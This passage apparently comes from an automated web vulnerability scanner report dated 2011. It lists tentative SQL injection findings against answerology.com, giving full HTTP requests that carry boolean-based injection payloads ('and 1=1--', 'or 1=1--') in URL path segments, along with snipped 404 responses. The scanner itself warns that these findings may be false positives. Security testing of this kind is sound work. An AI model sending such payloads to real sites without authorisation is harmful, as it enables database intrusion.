Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands'%20and%201%3d1--%20/cosmogirl/CosmogirlLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands'%20and%201%3d2--%20/cosmogirl/CosmogirlLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.24. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/cosmopolitan/CosmopolitanLayout.js

Issue detail

Request 1

GET /cobrands'%20and%201%3d1--%20/cosmopolitan/CosmopolitanLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands'%20and%201%3d2--%20/cosmopolitan/CosmopolitanLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:46 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.25. http://www.answerology.com/cobrands/cosmopolitan/CosmopolitanLayout.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/cosmopolitan/CosmopolitanLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/cosmopolitan/CosmopolitanLayout.js'%20and%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/cosmopolitan/CosmopolitanLayout.js'%20and%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.26. http://www.answerology.com/cobrands/goodhousekeeping/GoodhousekeepingLayout.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/goodhousekeeping/GoodhousekeepingLayout.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 34982982'%20or%201%3d1--%20 and 34982982'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/goodhousekeeping/GoodhousekeepingLayout.js34982982'%20or%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:55 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cobrands/goodhousekeeping/GoodhousekeepingLayout.js34982982'%20or%201%3d2--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:56 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.27. http://www.answerology.com/cobrands/marieclaire/MarieClaireLayout.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.answerology.com
Path:	/cobrands/marieclaire/MarieClaireLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands/marieclaire'%20and%201%3d1--%20/MarieClaireLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands/marieclaire'%20and%201%3d2--%20/MarieClaireLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
